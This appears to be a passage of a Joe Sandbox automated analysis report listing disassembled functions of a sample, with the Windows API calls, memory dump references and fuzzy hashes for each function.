                                                                                                                                  Function 008BF838 Relevance: 6.1, APIs: 4, Instructions: 73COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 008BF844
                                                                                                                                  • IsDebuggerPresent.KERNEL32 ref: 008BF910
                                                                                                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 008BF930
                                                                                                                                  • UnhandledExceptionFilter.KERNEL32(?), ref: 008BF93A
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1656217398.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656258141.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.0000000000902000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656819451.0000000000903000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 254469556-0
                                                                                                                                  • Opcode ID: 134baaf706cb2e7dd8b5c62e036b2a1abf665d07fad8db1154a49be7262aea4e
                                                                                                                                  • Instruction ID: 541468cf8e42e840477c98bf6b1e5a3cd1fc34eff0e9843b32dabfa12f72bf34
                                                                                                                                  • Opcode Fuzzy Hash: 134baaf706cb2e7dd8b5c62e036b2a1abf665d07fad8db1154a49be7262aea4e
                                                                                                                                  • Instruction Fuzzy Hash: 93310775D062199BDF20EFA4DD897CCBBB8FF08304F1041AAE50CAB251EB719A848F45
                                                                                                                                  Function 008BE6A3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49COMMONLIBRARYCODE
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • VirtualQuery.KERNEL32(80000000,008BE5E8,0000001C,008BE7DD,00000000,?,?,?,?,?,?,?,008BE5E8,00000004,00901CEC,008BE86D), ref: 008BE6B4
                                                                                                                                  • GetSystemInfo.KERNEL32(?,?,00000000,?,?,?,?,008BE5E8,00000004,00901CEC,008BE86D), ref: 008BE6CF
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1656217398.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656258141.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.0000000000902000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656819451.0000000000903000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: InfoQuerySystemVirtual
                                                                                                                                  • String ID: D
                                                                                                                                  • API String ID: 401686933-2746444292
                                                                                                                                  • Opcode ID: 06003e3a6ab8c003a4d551121ea6b392e4b7a69577c84cb158eabfdc8f32941d
                                                                                                                                  • Instruction ID: 2128fd98401cf1b9a2f48ea1be19700ada05c9e9b8d0459d248c019e3d840d0b
                                                                                                                                  • Opcode Fuzzy Hash: 06003e3a6ab8c003a4d551121ea6b392e4b7a69577c84cb158eabfdc8f32941d
                                                                                                                                  • Instruction Fuzzy Hash: E701F7326001096BDF14DE29DC09BDD7BAAFFC4324F0CC221ED19D7251DA38D9058680
                                                                                                                                  Function 008C8EBD Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 008C8FB5
                                                                                                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 008C8FBF
                                                                                                                                  • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 008C8FCC
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1656217398.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656258141.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.0000000000902000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656819451.0000000000903000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3906539128-0
                                                                                                                                  • Opcode ID: f87528848ab5b579132e54027d5c720940378ad9c353ec8ac308b126ff6f53b4
                                                                                                                                  • Instruction ID: 4cc3237f4db753f34b837160107adcbfe562fa88ba80d5781a4c64abe99cb995
                                                                                                                                  • Opcode Fuzzy Hash: f87528848ab5b579132e54027d5c720940378ad9c353ec8ac308b126ff6f53b4
                                                                                                                                  • Instruction Fuzzy Hash: 7A31C6749412299BCB21DF28DC88BD8BBB4FF08310F5042EAE41CA6251EB309F818F45
                                                                                                                                  Function 008CD440 Relevance: 3.5, APIs: 2, Instructions: 464COMMONLIBRARYCODE
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1656217398.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656258141.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.0000000000902000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656819451.0000000000903000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: aeb1b63111f38c8b5239956e5f87fb8bcb0c35bf5c950da3c1a86b78fccd596c
                                                                                                                                  • Instruction ID: 03cade82124d7d908a1b71c882b37d15a435b4fd184bc7612b8de2271b71569b
                                                                                                                                  • Opcode Fuzzy Hash: aeb1b63111f38c8b5239956e5f87fb8bcb0c35bf5c950da3c1a86b78fccd596c
                                                                                                                                  • Instruction Fuzzy Hash: EC02FA71E002199BDF14DFA9C980BADB7B1FF88314F25826ED919E7285D731A941CB90
                                                                                                                                  Function 008BAF0F Relevance: 3.0, APIs: 2, Instructions: 45COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 008BAF35
                                                                                                                                  • GetNumberFormatW.KERNEL32(00000400,00000000,?,008DE72C,?,?), ref: 008BAF84
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1656217398.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656258141.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.0000000000902000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656819451.0000000000903000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FormatInfoLocaleNumber
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2169056816-0
                                                                                                                                  • Opcode ID: 5e73862cdd16c02cc2c41ec35053f3255c03efcf271ca0297542fbefe08a4f65
                                                                                                                                  • Instruction ID: 6961da546d9f19dedb8db217189388df1cf431d5be311d0651ad7b02dd810164
                                                                                                                                  • Opcode Fuzzy Hash: 5e73862cdd16c02cc2c41ec35053f3255c03efcf271ca0297542fbefe08a4f65
                                                                                                                                  • Instruction Fuzzy Hash: C5011E7A140319AAD7109F74DC45FAA77B8FF09710F009522FB15D7251D370AA15CBA5
                                                                                                                                  Function 008A6C74 Relevance: 3.0, APIs: 2, Instructions: 16windowCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetLastError.KERNEL32(008A6DDF,00000000,00000400), ref: 008A6C74
                                                                                                                                  • FormatMessageW.KERNEL32(00001200,00000000,00000000,00000400,?,?,00000000), ref: 008A6C95
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1656217398.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656258141.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.0000000000902000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656819451.0000000000903000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorFormatLastMessage
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3479602957-0
                                                                                                                                  • Opcode ID: 0ac4e7b90b7b7e87619d41508f29c61226b3332f77ec855863001242f40fcc96
                                                                                                                                  • Instruction ID: 61fdf1ddd8f9887c7210d2a67f67a52f5a63805d174339df1d442352a9b4e7d7
                                                                                                                                  • Opcode Fuzzy Hash: 0ac4e7b90b7b7e87619d41508f29c61226b3332f77ec855863001242f40fcc96
                                                                                                                                  • Instruction Fuzzy Hash: 32D0C931345300BFFA110B618D06F2A7B9AFF56B61F18C505B795E84E0EA749824E62A
                                                                                                                                  Function 008D19F4 Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,008D19EF,?,?,00000008,?,?,008D168F,00000000), ref: 008D1C21
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1656217398.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656258141.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.0000000000902000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656819451.0000000000903000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ExceptionRaise
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3997070919-0
                                                                                                                                  • Opcode ID: cb1fe2346b1d89cde5a107b0346f823cddf96c634c258ae422be132afc5af40c
                                                                                                                                  • Instruction ID: 7a0387428fcfea0dc05d0b0aa20072f71d69c310e547db8a3505bb7f91e3482f
                                                                                                                                  • Opcode Fuzzy Hash: cb1fe2346b1d89cde5a107b0346f823cddf96c634c258ae422be132afc5af40c
                                                                                                                                  • Instruction Fuzzy Hash: 34B15F31220608EFDB15CF28C48AB657BE0FF45364F25865AE899CF3A1C335E991CB40
                                                                                                                                  Function 008BF654 Relevance: 1.6, APIs: 1, Instructions: 147COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 008BF66A
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1656217398.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656258141.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.0000000000902000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656819451.0000000000903000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FeaturePresentProcessor
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2325560087-0
                                                                                                                                  • Opcode ID: 857681b5846154c5cd677ea6fb52682d32febdc7d6bc553793b75317dd2a0c96
                                                                                                                                  • Instruction ID: a3b88f10d55cda4e1cdf5977c722be92975442154056139e6c6a816a7fb056aa
                                                                                                                                  • Opcode Fuzzy Hash: 857681b5846154c5cd677ea6fb52682d32febdc7d6bc553793b75317dd2a0c96
                                                                                                                                  • Instruction Fuzzy Hash: 2E518BB1A116098FEB29CF99EC817AEBBF4FB48314F24857AD505EB391D774A900CB50
                                                                                                                                  Function 008AB146 Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetVersionExW.KERNEL32(?), ref: 008AB16B
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1656217398.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656258141.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.0000000000902000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656819451.0000000000903000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Version
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1889659487-0
                                                                                                                                  • Opcode ID: f9a7d827284fc555d3a360ce6ed0b5c6a57deba18bc6dcc045ea24fe3ddca7f7
                                                                                                                                  • Instruction ID: 7a69d4978b20921fbbfc1f768be2f214770d36a23f626caa6578826429cd27c2
                                                                                                                                  • Opcode Fuzzy Hash: f9a7d827284fc555d3a360ce6ed0b5c6a57deba18bc6dcc045ea24fe3ddca7f7
                                                                                                                                  • Instruction Fuzzy Hash: AAF03AB4E00A488FDB18DB18EC966D973F1FB99315F10429AD51597390C7B0EDC0CE61
                                                                                                                                  Function 008A40FE Relevance: 1.5, Strings: 1, Instructions: 276COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1656217398.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656258141.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.0000000000902000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656819451.0000000000903000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: gj
                                                                                                                                  • API String ID: 0-4203073231
                                                                                                                                  • Opcode ID: 147eef5d5f5063848d0ef1fecd966517055ef58848b24fe75370e3ccbfc4e3d4
                                                                                                                                  • Instruction ID: d78658bff7491afd3d46ccc1230ce203923e64aa5f53f293c65df1694dbd1854
                                                                                                                                  • Opcode Fuzzy Hash: 147eef5d5f5063848d0ef1fecd966517055ef58848b24fe75370e3ccbfc4e3d4
                                                                                                                                  • Instruction Fuzzy Hash: D5C147B2A183418FC354CF29D88065AFBE1BFC8308F19892EE998D7351D734E945DB96
                                                                                                                                  Function 008BF9D5 Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • SetUnhandledExceptionFilter.KERNEL32(Function_0001F9F0,008BF3A5), ref: 008BF9DA
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1656217398.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656258141.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.0000000000902000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656819451.0000000000903000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ExceptionFilterUnhandled
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3192549508-0
                                                                                                                                  • Opcode ID: a03c76ee60cc7e192948c5ae052302a98039dce177de849f98f47cc19764d8c1
                                                                                                                                  • Instruction ID: fc312e50d68c4ad90e3a7580277dabb71727e43e36a4c1ce0b5af9a7beec6b41
                                                                                                                                  • Opcode Fuzzy Hash: a03c76ee60cc7e192948c5ae052302a98039dce177de849f98f47cc19764d8c1
                                                                                                                                  • Instruction Fuzzy Hash:
                                                                                                                                  Function 008CC030 Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1656217398.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656258141.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.0000000000902000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656819451.0000000000903000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: HeapProcess
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 54951025-0
                                                                                                                                  • Opcode ID: 81aed1444964cb34966f7959f423e4dbcd38d83bddcd91ae910052ebfc41707b
                                                                                                                                  • Instruction ID: 49d987856718a9272979cb4462cad65069d62ee8584cd69a4443f7932b1633d2
                                                                                                                                  • Opcode Fuzzy Hash: 81aed1444964cb34966f7959f423e4dbcd38d83bddcd91ae910052ebfc41707b
                                                                                                                                  • Instruction Fuzzy Hash: 91A01130202202CFCB008F30AE0C2083BA8AA00280308002BA008C8020EA2080A0AA02
                                                                                                                                  Function 008B62CA Relevance: .8, Instructions: 829COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1656217398.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656258141.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.0000000000902000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656819451.0000000000903000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 5f8113f2fe17e1fe5adf28291dd6dc1f64d00099287cbfcd1ac5a0770544dab2
                                                                                                                                  • Instruction ID: 249a715bbf6fb9e7c9df807bb158abddf6c0b5ddc7151cbb57f6a6f8bc54f272
                                                                                                                                  • Opcode Fuzzy Hash: 5f8113f2fe17e1fe5adf28291dd6dc1f64d00099287cbfcd1ac5a0770544dab2
                                                                                                                                  • Instruction Fuzzy Hash: B96291716047899FCB25CF28C4906F9BBE1FF95304F08896DD8AACB346E638E955CB11
                                                                                                                                  Function 008B77EF Relevance: .8, Instructions: 817COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1656217398.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656258141.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.0000000000902000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656819451.0000000000903000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: bb9617cfb9dcd5ed73515ceaa1cdae9c81077d575e7d9551ef57e855e6e5c47f
                                                                                                                                  • Instruction ID: 712880f767faeddfd78123a5cb0a7a4eca49c11cf0791e2fdc5e69149456fbfe
                                                                                                                                  • Opcode Fuzzy Hash: bb9617cfb9dcd5ed73515ceaa1cdae9c81077d575e7d9551ef57e855e6e5c47f
                                                                                                                                  • Instruction Fuzzy Hash: 6062B3716087898FCB19CF28C8909A9BBE1FFD5304F18896DE99ACB346D730E945CB15
                                                                                                                                  Function 008AF461 Relevance: .7, Instructions: 694COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1656217398.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656258141.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.0000000000902000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656819451.0000000000903000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 07bf4a65aa449dff48fd2b0c9f6b18a690921bffffe8b35fa307a18f9ecacfdb
                                                                                                                                  • Instruction ID: ad95afb869cfaf952b53e817cac89212fcabd7b64e8e98ac5d676f85dbeaea9d
                                                                                                                                  • Opcode Fuzzy Hash: 07bf4a65aa449dff48fd2b0c9f6b18a690921bffffe8b35fa307a18f9ecacfdb
                                                                                                                                  • Instruction Fuzzy Hash: 41523972A187018FC718CF19C891A6AF7E1FFCC304F498A2DE5959B255D334EA19CB86
